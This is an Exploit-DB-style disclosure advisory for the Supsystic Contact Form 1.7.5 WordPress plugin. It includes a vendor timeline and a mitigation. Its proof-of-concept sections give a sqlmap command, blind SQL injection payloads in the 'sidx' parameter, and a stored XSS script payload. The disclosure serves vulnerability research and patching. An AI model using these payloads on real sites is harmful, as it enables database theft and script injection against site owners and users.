WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities

vendor:

Contact Form by Supsystic

by:

Erik David Martin

7.5

CVSS

HIGH

SQLi, Stored XSS

89, 79

CWE

Product Name: Contact Form by Supsystic

Affected Version From: 1.7.5

Affected Version To: 1.7.5

Patch Exists: YES

Related CWE: N/A

CPE: a:supsystic:contact_form_by_supsystic:1.7.5

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 16.04.6 LTS / WordPress 5.4.2

2020

WordPress Plugin Supsystic Contact Form 1.7.5 – Multiple Vulnerabilities

The GET parameter 'sidx' does not sanitize user input when searching for existing contact forms, allowing for SQL injection. The 'Edit name' and 'Contact information' features are vulnerable to stored XSS, allowing for malicious JavaScript to be executed.

Mitigation:

Sanitize user input when searching for existing contact forms, and ensure that user input is properly escaped when outputting to the page.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-by-supsystic.1.7.5.zip
# Version: 1.7.5
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2


# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 10/12 2020: Vulnerability fixed


##################################
			   SQLi
##################################


# 1. Description

The GET parameter "sidx" does not sanitize user input when searching for existing contact forms.


# 2. Proof of Concept (PoC)

Use ZAP/Burp to capture the web request when searching for existing contact forms and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic

sqlmap -r request.txt --dbms=mysql -p sidx --level=5

Parameter: sidx (GET)
	Type: boolean-based blind
	Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=(SELECT (CASE WHEN (9602=9602) THEN 0x6964 ELSE (SELECT 9695 UNION SELECT 1181) END))&sord=desc

	Type: time-based blind
	Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=id AND (SELECT 4102 FROM (SELECT(SLEEP(5)))vOKL)&sord=desc



##################################
			Stored XSS
##################################


# 1. Description

The "Edit name" and "Contact information" features are vulnerable to stored XXS.
Location: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms_edit&id=[FORM ID]


# 2. Proof of Concept (PoC)

Enter the following payload into the "Edit" field in the top left corner: "><script>alert(1)</script><!--'
The payload will execute when viewing the "Show All Forms" section.
Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms